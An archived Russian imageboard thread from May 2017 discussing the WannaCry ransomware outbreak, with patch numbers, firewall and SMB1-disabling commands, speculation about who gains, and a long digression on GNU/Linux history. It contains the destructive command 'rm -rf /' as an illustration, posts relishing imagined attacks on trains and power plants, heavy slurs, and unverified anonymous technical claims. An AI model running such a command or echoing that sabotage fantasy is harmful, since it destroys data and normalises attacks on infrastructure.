Анон, будь ласка:
- никаких постов с одной и той же пастой
- никаких постов с одними и теми же картинками
- никакого самоподдува в тредах.
- только ориджинал контент, только последние сводки, только информация
Слоупок не успевает за тредами - только закончил 26й
Сделал, как на пикрил, нет таких веток в реестре.
>Сделал, как на пикрил
Отклеилась.
Итак, что мы имеем на данный момент по миру: больницы Бриташки всё, телефония Испании всё, заводы Рено всё, банкоматы Китая всё, сеть Петробас всё, поезда в Греции пошли под откос. Алиса в мире ПИЗДЕЦ.
НАЧАЛОСЬ.
ОП-хуй, нахуй ты постишь комулятивные обновы с зондами?
Мировая IT-инфраструктура ВСЁ.
Кидаем ссылки на подборки новостей:
- https://www.gazeta.ru/news/seealso/6776581.shtml
- https://ria.ru/trend/cyberattack-world-12052017/
Свежие оперативно обновляемые сводки с мест событий:
- https://www.superstation95.com/index.php/world/3863
Доступно обновление для шифровальщика, обязательно обновитесь - http://thehackernews.com/2017/05/wannacry-ransomware-cyber-attack.html
Зловред обезумел, сможешь ли ты совладать с ним?
Червь-шифровальщик, червь-вымогатель, червь-пидр.
Plague Inc, IT edition.
Бля откуда столько паники? Обычный avz сносит его к хуям.
А вы представляете, какого сейчас авторам шифровальщика? Ведь если они действительно рассчитывали на такую всемирную славу, то они - полные аутисты. Поэтому наиболее вероятно, что просто что-то пошло не так, и сейчас они мылят верёвки и сушат сухари.
Алсо, периодически форсится инфа, что они-де из Африки. Хоть какие-то пруфы на это уже были?
Эта уязвимость пропалилась каким-то алчным дебилом с криптолокером, а не хардкорными криптоанархистами с нюками всей системы. Представьте себе последствия во втором случае.
Такой потенциал, и такой проёб. Из-за банальной жадности. А ведь какое поле было бы, как минимум хотя бы для политического заявления.
Было бы охуенно. Все бы схватились за головы, а разговоров было бы на годы вперед. Это как война, большое потрясение, только без человеческих жертв. Хакерам бы досталась эпичнейшая слава Герострата, а не копейки, за которые они все равно заживо сгниют в Гуантаномо.
Добавил в шапку.
А ведь могло быть всё гораздо хуже. Вместо шифровальщика это мог оказаться нюк. Или радмин. Или вообще шифровальщик мог действовать тайно, без палева и без шифрования содержимого рабочих столов. Никто бы ничего и не заметил. А потом массово с рельс начали бы сходить поезда, электростанции бы массированно отключались а химзаводы начали сбрасывать отработанные стоки прямо в реки.
Успешные люди!
Шо почалось?
Порнуху нипасматреть((((
Петробас и Рено? Надеюсь сегодня в Ф1 у Мерсов все наебнется и выиграют Феррари.
Ты понимаешь, что они СПЕЦИАЛЬНО сканируют целые сети и заражают их?
Как рядовой инженер-пролетарий мечтаю об информационном апокалипсисе. Чтоб уже ёбнуло так ёбнуло, наконец. Ибо уже заебался со всеми вышестоящими коллегами сраться на темы о необходимости вкладываться в безопасность и надёжность. Никто никогда не слушает. Даже внутри IT-компаний. Пока есть прибыль, манагеров ничего не волнует.
Да наступит всеочищающий Цифровой Великий Фильтр во славу бинарной справедливости.
Так я нихуя не понял, если у меня на роутере закрыт этот порт, то можно спать спокойно? Хуле не добавили инфу об этом в оп-пост?
Перекачусь и снова зареквестирую линуксоидов.
Что не так с iptables? Говорите давайте, мне все равно, что зубрить вместо него.
Что не так с iptables? Говорите давайте, мне все равно, что зубрить вместо него.
Почему так много идет на китай? Это план по обвалу битков, лол?
У меня только один вопрос -
Кому выгодно?
Уязвимость известна давно до 2й16
@
Эксплуатировалась пендоской спецурой
@
2 мес как выпущено исправление
@
Большинство зараженных в России и Украине
@
$30к профита при цене эксплойта 50+
@
Платежеспособный спрос в других странах, в тч по распространенности биток
@
Заздело гейропейцв
Почалось?
А с учётом реинкарнированной вчера уязвимости Ворд+ртф?
Все добавил в шапку.
Нет никакого вируса, всё утка и фотошоп.
Блять только что был 25 и уже 29 вы че ебанулись
> второй пик
Это ведь не тот самый известный Мобильный Аналитик?
Все пропатчнные против вкр пеки получили обнавленный зонд? Не зряж хп 2к3 патчили.
СПАСАЕМСЯ ОТ БОТНЕТА
СПАСАЕМСЯ ОТ БОТНЕТА
СПАСАЕМСЯ ОТ БОТНЕТА
СПАСАЕМСЯ ОТ БОТНЕТА
СПАСАЕМСЯ ОТ БОТНЕТА
СПАСАЕМСЯ ОТ БОТНЕТА
СПАСАЕМСЯ ОТ БОТНЕТА
Йеп.
На все вопросы один ответ. Всем везде уже сколько в уши ссут про русских хакеров? Так даже Сноуден с Ассанжем не хайпились. Вот на волне мировых новостей про хакинг, вот это вот все.
Виндокапец настаёт , братья столлманы будущие наступает !
ЖТА СА навека.
Сам не знаю, с чего вдруг анон в предыдущем треде спизнул, что это говно без задач.
Пакеты фильтрует? Фильтрует. Так что можешь смело открывать маны.
Апдейт для вин 7 4012212 устаревший, нужно ставить KB4019264 вместо него. Поправьте шапку, чтобы аноны не страдали хуйней как я
Добавьте в шапку: у кого нат можете не ебать мозги
Хорошо хоть мы евровидение успели провести
А какой бы фейверк мог исходить от атомных электростанций ммммм, третья мировая бы даже не понадобилась
Пидар, спермоблядь не человек.
Да блин, антош, мне понятны комманды. Мне непонятна пока философия. В винде я запретил все входящие-исходящие, а затем задал исключения для определенного софта. А тут как? Ч знаю как блокировать, но не пойму что.
Хитрый мега-план века:
1. Намеренно создаешь уязвимость в протоколе smb
2. делаешь под нее иксплоит
3. АНБ следят за ключевыми фигурами в политике и компаниями на протяжении 10 лет
4. Спустя 10 лет Вкидываешь часть эксплоитов чтобы подогреть интерес
5. Предлагаешь купить самую вкусную часть этого пака
6. Чуть-Чуть продаешь
7. Выкидываешь в паблик 2-ую часть сплоитов
6. Ебошишь криптолокером все на свете, капает еще несколько десятков тысяч бачинских
7. Касперский поднимает на форсе пару миллиардов долларов
8. Майкрософт поднимает на форсе количество обновившихся до 10-ки
9. Эппл поднимает на форсе
10. Удаляльщики порнобанеров, нимножк поднимаются на форсе
11. Только выиграли.
Кому это выгодно?
Так-то да - тут вам и апдейты винды, и продажи маков. Даже антивирусники даже небо и даже Аллах в профите.
Плюс закручивание гаек в интернете - новая версия PRISM от NSA на Штаты, инициативы GHCQ и BND в Европах, ну и куда же без Роскомнадзора - и всё это же для вашей безопасности.
Ты ебу дал , с чего ты взял что там хоть что на винде ?
Пидар, думающий что аэс управляжтся спермоосью, так вот С А С И Х У И Д А Л Б А Е Б. КАК ТО ТАК, А ХУЛИ, НЕ В КРЫСУ.
Это Desktop тред?
В Zog тред есть или все зогачеры суда протекли?
Все на винде.
инсайдер сообщал что винда там есть
https://www.1tv.ru/news/issue/2017-05-13/21:00#1
Проиграл. Бобук на 5:35. Бобук на первом канале лол
Проиграл. Бобук на 5:35. Бобук на первом канале лол
Нет это внешний IP тред , кидай в тред свой внешний IP и местный гадалка анон предскажет когда ты соснешь хуйца у хакера молодца ..
https://www.cyberciti.biz/faq/iptables-block-port/
Что там непонятного-то?
В случае с червём-пидором, если бы он был на линуксах, то аналогом запуска netsh для закрытия порта в нашем случае была бы такая команда:
# iptables -A INPUT -p tcp --destination-port 445 -j DROP
ВСЁ.
как что-то плохое
У него же есть триальная расшифровка пары-тройки файлов? Почему нельзя сравнивая зашифрованный файл и расшифрованный вычислить аес ключ которым он все это и нахуярил?
заебали, куда вы перекатились?
заебали, куда вы перекатились?
> с чего ты взял что там хоть что на винде ?
Почитай про stuxnet, например. И такая "инфраструктурная защита" почти по всему миру. Что сейчас и видно.
Охуеть что происходит!
Фригейт выключи, дебсон.
Вы все не спите ещё?
Ох маня не хочу ломать твой мирок , но погугли что и где и как используют большие корпорации по типу гугла ... И это далеко не винда , даже их хвалебные нейросети на чем работают а ютуб на чем с кластерами , а твой роутер на чем? И да дахуя андроид устройств это тоже линукс
Не советую лол.
>Почему нельзя сравнивая зашифрованный файл и расшифрованный вычислить аес ключ которым он все это и нахуярил?
заебали, куда вы перекатились?
Криптограф, плс.
>
>Кто не хочет обновятся, просто пишет это в командную строку.
>
>netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=135 name="Block_TCP-135"
>netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name="Block_TCP-445"
И что мне это даст? Закроются порты через которые эта параша попадает на пеку? Какие побочные эффекты?
>KB4019264
>May 9, 2017—KB4019264 (Monthly Rollup)
>This security update includes improvements and fixes that were a part of update KB4015552 (released April 18, 2017) and also resolves blabla
>April 18, 2017—KB4015552 (Preview of Monthly Rollup)
>This non-security update includes improvements and fixes that were a part of Monthly Rollup KB4015549 (released April 11, 2017) and also includes these new mehmeh
>April 11, 2017—KB4015549 (Monthly Rollup)
>This security update includes improvements and fixes that were a part of update KB4012218 (released March 21, 2017), and also resolves the following security hurrdurr
>March 2017 Security Monthly Quality Rollup Windows6.1-KB4012215
>MS17-010 Security update for Windows SMB Server
Ну как бы да, KB4019264 включает все фиксы и улучшения, которые были до него. Но уязвимость самбы1 закрыта уже в KB4012215
КАК ТУТ УСНЕШЬ ТОО?!!! ПОСЛЕДНИЕ ДНИ ОСТАЛИСЬ!
Не, ну я это абстрактно сказал.
Ключ при криптовании/декриптовке он должен же где-то держать, чому бы не трекать его?
ловите новые мемсы
batya zherebets v3.0
Пидарасы, мне курсач надо делать, а я пеку боюсь включать.
Livecd тебе в помощь
Дааа, именно. Я знаю, как закрыть/открыть/добавить исключения/создать свою цепочку. Но я не знаю, что туда вносить. То есть по факту мы знаем, что имеется вирус долбящийся в порт, мы его закрываем.
А как сработать до этого, запретив все и разрешив лишь нужное? Как в шинде, где ты позволяешь лишь определенным программам иметь доступ в сеть.
И да, извини за глупые формулировки, просто ты говоришь с нубом.
Алсо, раз такая пьянка, не порекомендуешь софт под арч для логирования трафика? С портами, протоколами, айпишниками и объемом данных?
Я боюсь лабы делать потому шо если я их сделаю и он их зашифрует, меня нахуй порвет аки первокурсницу на вписке.
А чем тебя tcpdump и ему схожие не устраивают ?
Не хочу ломать твой мирок, но тот же андроид это не совсем линукс.
Как же ахуенно что под еба линуксы нет шифровалщиков , за исключением какого там хкя который не смог собрать через cmake install
>KB4012215
Прост он не показывается в списке обнов, если исать автоматически. А вручную скачать по ОП-ссылке тоже не смог, кнопки даунлоад тупо нет.
Ничем же, просто мне интересно мнение на эту тему уже опытного человека.
Кек. Ничего, что ни одна электростанция не имеет выхода в сеть? Вообще. Как и химзаводы.
>Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0 -Force
У меня такой опции нет.
Ой блять, чего ещё спизданешь?
Анимедаун, команду прочти. Правило создаётся на закрытие портов.
Деанон.
Да это кастрированный линукс но линукс вей ЧЯДНТ?
Не смотря на график цены биткоина, уверен, что сейчас его цена должна была подняться из-за данного события.
Не хочу ломать твой мирок, но тот же линукс это не совсем линукс.
Плюсую.
Хотя я клиент для сетей ms удалил лол
Лол
Линукс лишь ядро, причем хуевое, причем линукс это его кликуха.
По типу убунта не линукс ?
Не линукс это все имеющее гуй.
Ок уговорил правильно gnu/Linux дистрибутив
>А вручную скачать по ОП-ссылке тоже не смог, кнопки даунлоад тупо нет.
Я загуглил https://www.askwoody.com/2017/patch-tuesday-just-hit/
Хотя, имеет смысл качать именно майское обновление https://www.catalog.update.microsoft.com/Search.aspx?q=KB4019264 но народ жалется на отваливающийся dns, сами майки кпоминаю про проблемы на кариззо и ддр4
Нет. Убунта вообще не ос. Гугли про гну, копилефт и прочую красноглазую хуйню о компьютерном коммунизме в юниксах.
All the perdoliques come out at night...
Ты аутист. Уязвимость выплыла в 16г когда одни хэка вскрыли других, анбшных, хэка. Сделали вид в мс что подлатали в марте 17, и теперь с хп и 2к3.
И да даже iPhone это тоже Unix , там ядро от freebsd
Вот на болванке зверь двд тоже дистрибутив.
Сажи унылому форсу
Нет, не от него.
от freebsd там мржет быть строчка кода, а может быть нихуя.
Ну так убунта это костыль , своего рода резиновый член без смазки в мире красноглазых
Это паста из тонущего.
> KB4019264 но народ жалется на отваливающийся dns
Днс-зонд не у все
Зато как отправная точка неплоха.
Тебе дорога в s/ на самом деле.
>А как сработать до этого, запретив все и разрешив лишь нужное? Как в шинде, где ты позволяешь лишь определенным программам иметь доступ в сеть.
Вот пример - https://superuser.com/a/152830
Логика там примерно такая, на примере входящей цепочки - сначала блочим всё:
# iptables -P INPUT DROP
А потом разрешаем только то, что нужно:
# iptables -A INPUT -p tcp --dport 80 -j ACCEPT
После этого всё входящее будет дропаться, а приниматься только tcp-данные для 80-го порта.
> софт под арч для логирования трафика? С портами, протоколами, айпишниками и объемом данных?
tcpdump. Если нужно что-то более специализированно автоматизированное, то рекомендую немного освоить python (для админства под прыщами будет полезен, бояться не надо, даже если не прогер - он не сложнее баша для твоих задач будет) и потом воспользоваться scapy (это типа сетевая либа под питон) - через него какой тебе самому надо мониторинг трафика запилить, такой и сделаешь за ~30-50 строк кода.
Посоны, как мне SMB1 отключить?
Виндовые шары и твой домен поламаются. Лучше самбу 1й версии отключить если нет хп и сервера 2к3
Спасибо огромное за детальный ответ. Добра, антош!
> 14946357931382.png
У меня нет такого пункта
У меня нету обновлений вобще, ваших служб у меня вобще нету, 445 порт закрыт.
Где ваш бог теперь?
Где ваш бог теперь?
А почему она вообще вкл ? Помню когда пердолил в линукс шару для смартв в дебиан вики предупреждали что не стоит использовать smb1 а стоит юзать smb2 ?
А то!
Спермобляди как всегда соснули у никсобогов.
Мимо прыщеблядь
а как откатить эту команду когда всё будет гуд?
А вот фиг, наоборот - уже вечером в пятницу было отмечено падение в связи с атакой.
чому сагуешь?
Зачем тебе самба ? Если есть всякие фтп и что там ещё на винде из коробки
Вот именно что она подобная, у меня в прошивке древнего тв есть лицензия на фрибздю, как и в плойке, как и в роутере. Любое говно работает на колесе которое давно изобрели и его необходимо упоминать, что не взяла за яйца AT&T. Но все эти оси, юникс семейств между собой имеют общего ровным счётом нихуя, и проприетарщина будет написана с самого начала и закрыта.
Для совместимости со старьем - хп, твбоксы на линуксе с ядром 2.6 и тд.
Рекомендовали уходить с 1й версии в сент16
Ну охуеть теперь.
по дефолту в /b/, ничего годного не бывает
какая нахуй самба?
netsh -help
ди жанейро
>Но все эти оси, юникс семейств между собой имеют общего ровным счётом нихуя, и проприетарщина будет написана с самого начала и закрыта.
Вот тут ты не совсем прав.
https://opensource.apple.com/release/macos-10124.html
Если начнётся, инета не будет, биток перестанет ходить. Было уже на пару дней когда два океанских кабеля перерезали.
у меня начинает тлеть с вас. Просто скажите как откатить ебучие команды и патчи от шиндовс
Почаны, а эти кумулятивные обновления Monthly Rollup включают все-все мякотки от момента выхода сервис пука SP1 для семёрки? Этакий SP1+1/2, или есть ещё что? Всякие обновы для пидорнет эксплорера, мувимейкров и прочих виндов медиа плееров меня неочень интересуют
SMB это
Super Mario Bros
v1 v2 v3
Это три части номерные.
Super Mario Bros
v1 v2 v3
Это три части номерные.
> у меня начинает
Да ты ни паарься
2 чаю , что в пинусе команды ls ,rm , cp, mv и т.д что в маке и на всех юниксах они будут одинаковы
что такое самба?
Двачую.
Угу-угу, не считая гнутых расширений.
Дидект скрирткидди автор говновируса ?
Твоя гама для дитишк, мы гамим в сервер месдж блок 1,2,3
Самба это штука для расшаривания файлов между..чем нужно, хоть между хостом и виртуалкой. Мог бы и погуглить.
Блять, сижу с XP, в ваши треды не захожу, я уезвим?
-
Да раком мозга , и отстутсвием какого либо интеллекта , зачем тебе хр в 2к17?
Ты зашел, а значит все уже.
Уязвим.
ИДИНАХУЙ ПРОСТО БЛЯТЬ СКАЖИ КАК ОТКАТИТЬ ВСЮ ТУ ХУЙНЮ КОТОРУЮ Я НА СЖАТОМ ОЧКЕ ЩАС НАКАТИЛ БЛЯТЬ
А зачем? Что-то не работает?
Это не отменяет того что ты аутист. Лол
Так и знал. Черт.
https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
>Additionally, we are taking the highly unusual step of providing a security update for all customers to protect Windows platforms that are in custom support only, including Windows XP
Вкатывай обнову и будешь снова неуязвим 20 лет как неуязвим, лол
К чему 1 пик? В армейке нет интернета.
нА случай если вдруг перестанет блять
Ай молодца , смотри что макопидоры не понабежали со своими хакинтошами
А почему нет?
> устраняешь дыру на поддерживаемой ос за месяц до атаки
> куча необучаемого быдла орут шо мелкософт параша
А я не автор.
>что в пинусе команды ls ,rm , cp, mv и т.д что в маке и на всех юниксах они будут одинаковы
А вот тут ты НЕ прав. Перечисленные тобой команды, а, точнее, программы, поскольку каждая из них - это отдельный бинарь, реализованы в одном пакете, исторически называнным coreutils. Но реализация coreutils есть как в рамках проекта GNU, в котором предпочитают лицензию GPL, так и в рамках проекта FreeBSD, в котором предпочитают лицензию BSD. Так вот, если в Apple и используют наработки открытого ПО, то только того, который под BSD, поскольку тогда они не обязаны отдавать изменения обратно, что очень выгодно проприетарщикам, и что не возможно при GPL.
Но я отвлёкся. Так вот. У программ из coreutils от разных проектов даже ключи, формат вызова и/или поведение отличаются.
Скачиваешь Rufus и записываешь убунту , дальше все сам поймешь
>гама для дитишк
Хер пройдешь с ходу ни одну часть.
А сраный вирус любой я акронисным бекапом с облака за 7 минут откачу, хотя только макак не справиться с прочитанным в шапке.
Вот тогда и погуглишь. А так, тебе оно и даром не надо. Просто потому что ты даже не знаешь что это.
Нет, с виндой все в порядке.
Харкач образовательный.
Что-то подозрительно это всё.
Ноо с точки зрения юзера ему похуй , главное что работает
твой спойлер успокоил меня, спасибо
Выпьеш и расслабишся анальными играми
Всему тебя учить нужно.
А я вообще не понимаю суть гну, линуксов и чому это разные вещи..
Юзай облако дебс
Сука деб livecd пинуса тебе в помощь что сложного загрузится с флешки , весь нужный софт есть из каробки
Облако, флешки, автобекапы - куча способов для юзера.
>с точки зрения юзера ему похуй , главное что работает
Какого юзера, консольного?
Ещё раз, простыми словами:
В GNU/Linux и в FreeBSD/OSX команда запуска rm, например:
rm -rf /
приведёт к разным результатам.
Я утрирую, конечно. С rm это не так. Но для того же cp и ls опции сильно разнятся, например.
На гите разобрано где 2048битные ключи лежат чем как зашифровано и формат файлов, уже больше 12 часов как. Ключи уникальные для каждой установки.
Как же рад, что пару лет вкотился в линуксы.
А если у него лабы требуют виндософта вроде матлаба?
SMB это лишь протокол. Server Message Block
Самба это уже большая сетевая кроссплатформеная програмулина с файловой системой.
Что бы в токсах был срач , народу красноглазых нужно зрелище это что вроде колизея в Риме
дык ты и не на 10 сидишь, маня
http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598
Обновление для системы безопасности Windows XP SP3 (KB4012598) — особая поддержка
https://support.microsoft.com/en-us/help/4012598/title
То что мне на шарпах надо ебашить, которые на ваших прыщах без бубна не встают, блядь.
Ему она нахер не нужна энивей, раз он даже не знал о существовании десу.
Ну так это ясно , а что касается на счёт стандарта man cp или вызова -help ?
Не понимаешь, но хочешь чтобы тебе кто-то разжевал? Да он заебётся всю историю тебе рассказывать, там материала на целую лекцию, на самом деле, почему получилось так, как получилось.
Если же самому реально интересно, то можешь начать хотя бы с https://www.gnu.org/gnu/thegnuproject.ru.html и https://ru.wikipedia.org/wiki/Проект_GNU
Тогда страдай , а что там с reactors ?
При чем тут уникальность каждой установки, блядь, когда я говорю о том что у него есть бесплатная расшифровка пары-тройки файлов.
И вот для расшифровки этих файлов, он должен пользоваться тем же уникальным ключом, который можно было бы спиздить, разве нет?
Ну а на самом деле? Юниксы, гну, линуксы...Блжад, надо вики идти читать, а то вроде с линухом пердолюсь, а предыстории не знаю.
А разгадка одна - попаболь нищука Штульмана, глядя как поднялся Торавольтос.
Котоны, а ХРюшу тоже могут взломать?
да, обнова в
Да не надо истории, хватило б и ссылок либо пары слов.
И да, спасибо за материал
Особенно хрюшу.
Даже эмбеддед, as far as i know
Только вселенная управляется аппаратно володей остальное все софтово.
Правильно говорить gnu/Linux а не Linux мы ведь писали инструменты работы с ядром ... обиженное лицо Столлман
Сделашь, раскажи нам
Посмотри фильм у дмитрия бачило на эту тему с русской озвучкой "революция"
Забэкапил уже, не прельщает перспектива добавлять телодвижений себе по сливу своей параши в облако.
Гитхаб вообще в рот ебал.
Если бы на том же пихоне надо было делать, хуярил бы все на c9 и похуй, но увы.
Пока не подцепил и рад
Как же плохо быть тупым. Как же я завидую людям разбирающимся в этом всем.
Поймал твой хуй своей щекой.
Расскажет он за несколько битков
Да вы че раскудактились, остановили уже этот йоба вирус, ждем версию 3.0
О, спасибо и тебе.
Бляя, вот это я ошибся, так ошибся. Наоборот я имел ввиду, похуй, кароче, мне спать пора.
>что касается на счёт стандарта man cp
А, точно! Забыл упомянуть. Спасибо, что напомнил, лол. Сначала хотел было возразить, какой тебе нахуй стандарт на cp, но потом вспомнил, что есть такая хуета - https://ru.wikipedia.org/wiki/POSIX - стандарт, запиленный как раз прыщестроителями, дабы хоть как-то урезонить этот зоопарк. Так вот, макось этому стандарту формально полностью соответствует, в то время как ни один из дистрибутивов gnu/linux, формально - нет.
Вот, например, что должна делать по стандарту cp - http://pubs.opengroup.org/onlinepubs/9699919799/utilities/cp.html :
> cp -R [-H|-L|-P] [-fip]
Но это не значит, что в GNU или BSD в свои реализации cp они не могут добавлять дополнительные флаги, что они и делают. Просто сравните:
https://linux.die.net/man/1/cp vs https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/cp.1.html
Как на 7 отключить SMB, пидор?
Что там сложного , берешь и без задней мысли начинаешь читать geektimes habr opennet и т.д
>Блять, сижу с XP, в ваши треды не захожу, я уезвим?
Завидую тебе. Поставил недавно себе семерку - такая параша.
Если в кратце, 40 лет бородачи пиздили и форкали друг у друга пердоль, как-то её почти допили и вдруг несколькольким гнусам пришла мысль закостылить эту срань на пука, чтобы не поехать на сгуху, придумали сделать софт народным и заставить пердолиться с ним самих юзверей. Взлетело.
XP тоже уязвима
Спасибо за инфу , двач пердач образовательный особенно за мак так как я только планирую на него перекатиться
А 98?
Сирьезли ? В 2к1х год ? Ты бы ещё про вин 3.1 спросил
про неё хЗ
Бамп вопросу
> 3.1
Нет. Там юсб нет.
Доброе утро аноны =3
Столлману и прищеблядям , а вот ФСБ анб и т.д не очень , все таки образованное население это плохо
А если не так долговременной планировать?
В 98 по умолчанию smb нет, хотя можно приколхозить. Впрочем под ней скорей всего даже шифровальщик не запуститься, так что всё норм. Вопрос только каким хером она встанет на компы после 2005-7 года.
Я смотрю, вы тут все очень умные и уверенные в себе ребята. Но я уверен, что половина из вас насрет себе в штаны, если вдруг встретит меня ночью в безлюдном месте.
Ну насру и что ты сделаешь?
Шифровальщик?
И к чему это ты ? Ну насру я тебе на голову , и что дальше?
Virus ebani, eto ty?
Прости, но я не живу в России
............/´¯/)...............(\¯`\
.........../...//....ЗДОХНИ..\\...\
........../...//......ВИРУС.....\\...\
...../´¯/..../´¯\.ЕБАНЫЙ../¯` \....\¯`\
.././.../..../..../.|_......._|.\....\....\...\.\
(.(....(....(..../..)..)…...(..(.\....)....)....).)
.\................\/.../......\...\/................/
..\.................. /.........\................../
............/´¯/)...............(\¯`\
.........../...//....ЗДОХНИ..\\...\
........../...//......ВИРУС.....\\...\
...../´¯/..../´¯\.ЕБАНЫЙ../¯` \....\¯`\
.././.../..../..../.|_......._|.\....\....\...\.\
(.(....(....(..../..)..)…...(..(.\....)....)....).)
.\................\/.../......\...\/................/
..\.................. /.........\................../
Антоны что там с вирусом в wine есть подвиги его запуска?
А ведь можно было более профитнее наебашить вирус с данной уязвимостью.
Да ладна? Иди блядь обратно в свою вк парашу, дебич
Посоны, как отключить SMB на Win7 без установки какие-то параше-патчей???
Объясните довену, как работает шифровальщик, и на каком-нибудь примере объясните, как можно расшифровать файлы.
А тебе то что?
Только что Comodo Firewall 10 прислал уведомление с видосом.
https://www.youtube.com/watch?v=TVIhXwFJXMg
Конечно , толи это школьники то ли индусы , но очень глупо так использовать уязвимость таких масштабов
>как работает шифровальщик
Как шифровальщик, очевидно же?
шифрует твои данные на основе какого-то ключа. Ключ ты не знаешь. Чтобы узнать платишь бабки. Получаешь ключ. Дешифруешь файлы.
Загугли про pgp например
Это свинопараша из украины
Чисто теорию хочу узнать, я ж не такой дебил, чтобы вирус схватить и пытаться расшифровать. Мне просто интересно.
БЛЯДЬ ЗАГУГЛИЛ И КОМП РАСПИДАРАСИЛО СУУУУКА
Скорее всего aes так как в конпентенции авторов говнокода есть вопросы
Шапку прочесть блять. Открыть повершел и ввести одну строку.
Какие довны сидят на этом сайте. Просто пиздец
Аноны а что там правда за шифрование ?
Откуда мы знаем?
В этом и суть таких вирусов. Дебс
И это к чему видео?
Я в любой парашной песочнице могу с таким же успехом эту парашу запустить и хуй она наружу протечет
Амиго всё равно круче
Тогда поехали...
Началось всё с этой хуйни в Bell labs:
https://ru.wikipedia.org/wiki/Multics
Потом пришли эти ребята:
https://ru.wikipedia.org/wiki/Томпсон,_Кен
https://ru.wikipedia.org/wiki/Ритчи,_Деннис
И сотворили ЭТО:
https://ru.wikipedia.org/wiki/UNIX
Потом AT&T (куда входила bell labs) получила разрешение на анальное огорожение UNIX с целью профита. Здесь ветвь событий делится на две (Беркли и МИТ):
- до этого он был полностью доступен, и сами авторы рассылали исходники на пленках всем желающим по всем универам мира - одна из плёнок попала в Беркли, откуда началась https://ru.wikipedia.org/wiki/BSD , которую потом пришлось переделывать из-за наездов AT&T после огораживания, после чего и появилась https://ru.wikipedia.org/wiki/FreeBSD
- тем временем в https://ru.wikipedia.org/wiki/Массачусетский_технологический_институт , примерно параллельно событиям выше вот этот парень https://ru.wikipedia.org/wiki/Столлман,_Ричард_Мэттью с пылающим пердаком от огороженности UNIX создаёт свободную лицензию https://ru.wikipedia.org/wiki/GNU_General_Public_License - и свободную ось под ней - https://ru.wikipedia.org/wiki/GNU , т.е. набор многих компонентов. Всё бы хорошо, да вот ядро у этой ОС хуёвое - https://ru.wikipedia.org/wiki/GNU_Hurd , но здесь на помощь приходит простой финский парень - https://ru.wikipedia.org/wiki/Линус_Торвальдс и делает это https://ru.wikipedia.org/wiki/Ядро_Linux
Получается дистрибутив https://ru.wikipedia.org/wiki/GNU_Linux (ох, лол - вот видите, даже википидоры форсят перенаправление - они не понимают сути GNU, не будь как википидор). Потом на базе этой каши начинают появляться законченные дистрибутивы (debian, fedora - истории их проектов уже отдельно сам нагуглишь). Но никто не хочет называть gnulinux как gnulinux, а называет linux, из-за чего получаем https://ru.wikipedia.org/wiki/Спор_об_именовании_GNU/Linux
Ну а потом пришли проприетарщики. Apple - за BSD (osx) причём сначала, на волне популярности ядра Linux Джобс лично приглашал Линуса на собеседование и пытался переманить его для работы над маками, а Google - за GNU/Linux (android). И теперь они открывают только те компоненты, которые не могут не открывать из-за лицензии (называя это open source и сторонясь free software). Всё остальное, всё что можно, стараются закрывать.
Ну и чтобы всё ещё больше запутать:
https://www.gnu.org/philosophy/free-software-for-freedom.ru.html
https://ru.wikipedia.org/wiki/Свободное_программное_обеспечение
https://ru.wikipedia.org/wiki/Открытое_программное_обеспечение
Как-то так.
Дебс это ты , а вопрос к криптоанонам с реверсинженерингом в голове
Блядь, тред заполонили прыщечерви-пидоры
Уебывайте в свой гадюшник, не мешайте нам тут файлы проебывать
Уебывайте в свой гадюшник, не мешайте нам тут файлы проебывать
>а вопрос к криптоанонам с реверсинженерингом в голове
AES. А теперь вали отсевада
AES говорят
Вах, красиво расписал, спасибо тебе.
мимо-крок
АУЕ
Показывает что с обновлением, файлы не шифруются, а вкрипт можно к херам удалить.
Его и раньше можно было удалить
А на видосе он его тип в песочнице запускает, конечно у него файлы не зашифруются, он запускает их в отдельной среде лол
Крч, не верь им, анончик, все равно будь начеку
Как вы вообще умудряетесь ловить такую хуйню? Дайте ссылку. Гугл не помог.
Был bell labs
Придумал юникс, переписал его на си. Все ахуели
Был столман, понял, что юникс говно, начал писать свой. Понял, что не может без ядра.
Был линус, понял, что миникс говно. Начал писать свой. написал ядро. Все ахуели.
Потом объкеденили наработки столмана и линуса и сделали гну\линукс
гну - гну нот юникс.
Что еще?
БСД реализация юникса от беркли. Позже вышел фри бсд свободный от порприетарщины.
Гну требует от тебя открытия исходников и дележкой наработок
бсд не требует дележкой наработок, взял, закрыл, всем похуй.
То есть Антон с гидрой и хешкетом был прав что их можно дешифровать
>7. Касперский поднимает на форсе пару миллиардов долларов
>8. Майкрософт поднимает на форсе количество обновившихся до 10-ки
>9. Эппл поднимает на форсе
>10. Удаляльщики порнобанеров, нимножк поднимаются на форсе
Забыл ещё линуксоидов и биткоин.
Всё в сговоре!
Ну ебтвою мать, спустя 30 тредов до людей дошло.
Весь день вчера всем писал об этом
Если знаком хоть немного с английским, все приведённые ссылки рекомендую также просмотреть в англоязычном разделе - там инфы гораздо больше.
Ну и до кучи:
https://www.gnu.org/philosophy/free-software-even-more-important.ru.html
https://www.gnu.org/philosophy/open-source-misses-the-point.ru.html
https://www.gnu.org/philosophy/philosophy.html
А что касается мит лицензии?
Позже пошли сборочки от хипстеров для неосилдяторов
так и появились дебианы, убунты и арчи
Я не ебу в эти лицнзии
Извини антош что тебя оскорбил
Почему "вместо"? Наверняка через ту же дыру уже всех поимели и более скрытные товарищи, просто ждут своего часа.
Тупые хомяки, вирус же будет шифровать файлы в течении часа, как можно быть таким тупым...
Пока спермобляди сосут хуи в страхе сами у себя в их тредах прищебляди просвещают друг друга , знатный год будет
Ты деб что ли , большая часть спермоблядей даже не знают что такое файл не говоря о самбе и уязвимостях , все что надо это подрочить во что нибудь и все
Вот оно поколение Программистов
Не способны в простые вещи, зато фрилансир 300кквпикосекунду
Через webm треды возможно подцепить ?
Как новичку защетить свои сохраненки ?
P.S. мимо-человек который неумеет переустанавливать винду
Как новичку защетить свои сохраненки ?
P.S. мимо-человек который неумеет переустанавливать винду
я вот не понял. у меня на входе стоит роутер, во всех офисах на входе стоит роутер.
По умолчанию роутер нихрена кроме хттп не пропускает по 80 порту.
Как вирус достучится до 445 через роутеры мира?
По умолчанию роутер нихрена кроме хттп не пропускает по 80 порту.
